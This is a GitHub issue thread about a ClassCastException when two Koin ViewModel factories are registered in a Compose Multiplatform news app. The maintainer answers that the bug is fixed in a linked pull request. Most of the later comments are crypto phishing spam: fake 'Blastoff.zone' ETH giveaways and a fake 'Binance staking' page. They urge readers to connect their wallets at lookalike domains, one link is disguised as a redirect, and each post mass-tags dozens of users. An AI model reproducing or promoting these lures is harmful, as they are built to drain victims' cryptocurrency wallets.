### ISSUE TITLE
Multiple ViewModel is not working

### ISSUE THREAD

**Issue by shohrab-swl** [NikhilBhutani/ComposeMultiplatformNewsAppDemo#1]
[NewsAppDemoComposeMultiplatform.zip](https://github.com/icerockdev/moko-mvvm/files/13936500/NewsAppDemoComposeMultiplatform.zip)

 
fun presentationModule() = module {
    single {
        viewModelFactory { NewsHomeViewModel(get()) }
    }
    single {
        viewModelFactory { NewsDetailsViewModel(get()) }
    }
}

object ViewModelsFac : KoinComponent {
    fun getNewsHomeViewModelFactory() = get<ViewModelFactory<NewsHomeViewModel>>()
    fun getNewsDetailsViewModelFactory() = get<ViewModelFactory<NewsDetailsViewModel>>()
}

I just changed a few lines.

and i get this error

 java.lang.ClassCastException: com.niko.kmm.newsappdemocomposemultiplatform.presentation.details.NewsDetailsViewModel cannot be cast to com.niko.kmm.newsappdemocomposemultiplatform.presentation.NewsHomeViewModel

**Comment by NikhilBhutani** [comment]
This is now solved. https://github.com/NikhilBhutani/ComposeMultiplatformNewsAppDemo/pull/2/

**Comment by taylorcammack** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
zhouhongjian, @zeichuan, @mrneilsy, @arontang, @Noisivit, @jinweishen, @omicsnut, @Symbyos, @dotuanson, @MagicTokenKing, @Racekarts, @zdenekvecera, @shalakhin, @rwadisaputro, @amckay1, @haoxiaofeng, @CuPidev, @lalotto, @EwanPM, @EzDani1, @blueacker, @freewizard20, @dodo040, @derweeYang, @Toronto00, @mingren1992, @Dodo33, @trumhemcut, @crazyguitar, @Tarek-Bohdima, @xaqirinfluence-octo-cat, @YangXinlin, @gologo13, @msfwushao, @jaopsb, @Guroto, @luodaoyi, @coasterzu, @thiagosf, @execute237, @yxw, @xiefeifan, @wdeemaz, @hrsh38, @SHKD13, @innagit, @yukihirai0505, @baajarmeh, @gusakovm, @MitchPierias

**Comment by hupptechnologies** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
uvicorn, @sniranjan, @ayyilmaz, @PresleyHank, @hisah, @Damilare-Tolulope, @laid0724, @jinbearlo, @ary2708, @c2ray, @nimda32, @gautamkrishnar, @jpenagos29, @neps-in, @Adv4n6, @raimundojimenez, @kbad01, @parsakzr, @Frknrhn2, @mosaictheory-hy, @PseudoProgrammer, @jasonsgraham, @graezykev, @lorduakiti, @bryanwills, @roigecode, @f-L0x, @bziwei, @mlliarm, @Sagiacuarius, @graalogosh, @saschacan, @fan-wb, @jtymoszczuk, @theo-tpn, @yuta-mine, @ArtisticPoop, @grapeLux2, @TheDrimo, @wenboLee, @corpsgeek, @camitta, @CzarXerxes, @NicolaLS, @CY0xZ, @sharkanet, @felixhuff, @luis-zb, @sealion1215, @carterprice2

**Comment by steamyrails** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
sumsumcaca, @Calimos, @davidlwg, @arif-b-khan, @ramcqueary, @ClarePhang, @honeyspoon, @wollala, @juvu, @tomvardasca, @XingangL, @krispyensign, @psydzen, @wenweih, @jc-johnson, @FF99CC, @Adrian888888, @UnreasonablyBadd, @irfanp056, @durvalcarvalho, @d4f5409d, @SC-One, @likizju, @GitCodeMischer, @peng1027, @2020Cyberworld, @imcac, @BaoTrNG, @ARadmanesh, @boorseel, @Reecy-Z, @lgh025, @ilyamk, @easyguyme, @GastonGuan, @roohe, @rrichards, @elhamstar, @WilliamMajanja-zz, @quetzalcroix, @Jolanr10, @bgbruno, @quantatrading, @GeorgesAlkhouri, @onekyle, @mikeyhodl, @qiaoba-cat, @lbribeiro, @cybiz-tva, @A5L7Z

**Comment by joemansyahkemas** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
sujoy0306, @JessicaChg, @michaelansel, @wlchn, @Sosyetekadir, @akinwol, @mrlaz0s, @Jyrko, @deju, @WangSiTu, @gtonic, @makkinne, @Ozone2037, @zhubby, @Eliza121and, @wanghche, @nodiscardme, @darwindeveloper901, @seceret-cloud, @yurist38, @DEVIDTOKENS, @zinderud, @bmann, @xup3rr, @Newaygo, @PhiloCwh, @Dias878, @santoshmondal, @featheryus, @ruiyangchen23, @Confucian-PUT, @jacque006, @r6ra4, @ljb232, @GAMECHANGE, @yujianFresh, @About7Sharks, @sohailmahmud, @Abayomzee, @TwilightLogic, @Harith-Laxman, @kaiwong, @CloudBranch, @stockle, @codlin, @frankhu1089, @yangyuan6, @hagnosis, @TenviLi, @XuanjiuZhang

**Comment by YogaDarma182** [comment]
## 🚀 Double Your ETH with Binance Staking

Earn rewards and secure your financial future by staking your ETH with Binance. By participating in the Binance staking program, you can potentially double your ETH while supporting the blockchain network.

[![Start Staking Now](https://miro.medium.com/v2/resize:fit:720/format:webp/1*Ssf-ZH2f2V5dLyn7zYTXHg.png)](https://app.bnbinchain.com/en/bnb-staking?utm_source=email&utm_campaign=leads&utm_id=github)

**Click the banner above** to learn more and start staking your ETH with Binance today!

### How to Stake on Binance:
1. **[Visit the Official Binance Staking Page](https://app.bnbinchain.com/en/bnb-staking?utm_source=email&utm_campaign=leads&utm_id=github):** Click the link to navigate to the official staking page.
2. **Connect Your Wallet:** Ensure you have a wallet with sufficient ETH, then securely connect it to Binance.
3. **Interact with the Staking Method:** Follow the instructions to use the "connect" method and begin staking your ETH from your wallet balance.
KailZhang, @lucianosb, @x-cold, @KhyalKara, @banoresaurabh, @vizath, @BoxyPipesnake, @Matthewjarredondo, @dyy1993, @eralpkaraduman, @weimingtom, @LucasReSilva, @alexcpendleton, @9thbit, @bradjasper, @Dub22, @7rulnik, @yidemir, @cyan33, @ImNotMyself, @ameenkhan07, @xgdgsc, @awitherow, @Jabbasnik, @codingCoffee, @andrzejkaszkowiak, @kilimchoi, @okuznetsov, @artturik, @lexruee, @rifat826, @pranavlathigara, @coosar, @aliceblack, @notdaniel, @InterStelios, @huangkai31, @thatdaniboy, @adriaan, @llalueza, @snorik, @jhonnysanchezillisaca, @crisidev, @aranw, @y15a, @Zachinquarantine, @alwayrun, @parawuit, @wtpcomputers, @einaralex

**Comment by GAMECHANGE** [comment]
THX U
